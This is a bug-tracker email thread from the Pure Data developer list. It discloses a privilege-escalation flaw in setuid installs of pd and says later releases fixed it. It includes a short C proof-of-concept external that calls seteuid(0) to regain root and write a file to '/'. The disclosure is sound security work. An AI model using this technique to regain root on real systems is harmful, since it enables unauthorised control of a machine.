Bugs item #1602345, was opened at 2006-11-24 10:48
Message generated for change (Comment added) made by eighthave
You can respond by visiting:
https://sourceforge.net/tracker/?func=detail&atid=478070&aid=1602345&group_id=55736
Please note that this message will contain a full copy of the comment thread,
including the initial issue submission, for this request,
not just the latest update.
Category: puredata
Group: None
>Status: Pending
>Resolution: Fixed
Priority: 5
Private: No
Submitted By: Mathieu Bouchard (matju)
Assigned to: Miller Puckette (millerpuckette)
Summary: security vulnerability, giving root access
Initial Comment:
first configure with --enable-setuid or just chmod 4755 pd && chown root pd,
which has the same effect.
then load this external called crack.c by making a [crack] box or -lib crack:
#include <unistd.h>
#include <stdio.h>
void crack_setup (void) {
seteuid(0);
fopen("/hax0r","w");
}
An empty file called "hax0r" appears in protected folder "/" even though
privileges have been dropped by pd upon startup.
----------------------------------------------------------------------
>Comment By: Hans-Christoph Steiner (eighthave)
Date: 2007-11-05 20:01
Message:
Logged In: YES
user_id=27104
Originator: NO
I am pretty sure this the bug fixed by Miller's 0.40.3 and 0.39.3
releases. Please adjust if I am wrong.
----------------------------------------------------------------------
You can respond by visiting:
https://sourceforge.net/tracker/?func=detail&atid=478070&aid=1602345&group_id=55736
_______________________________________________
PD-dev mailing list
[email protected]
http://lists.puredata.info/listinfo/pd-dev
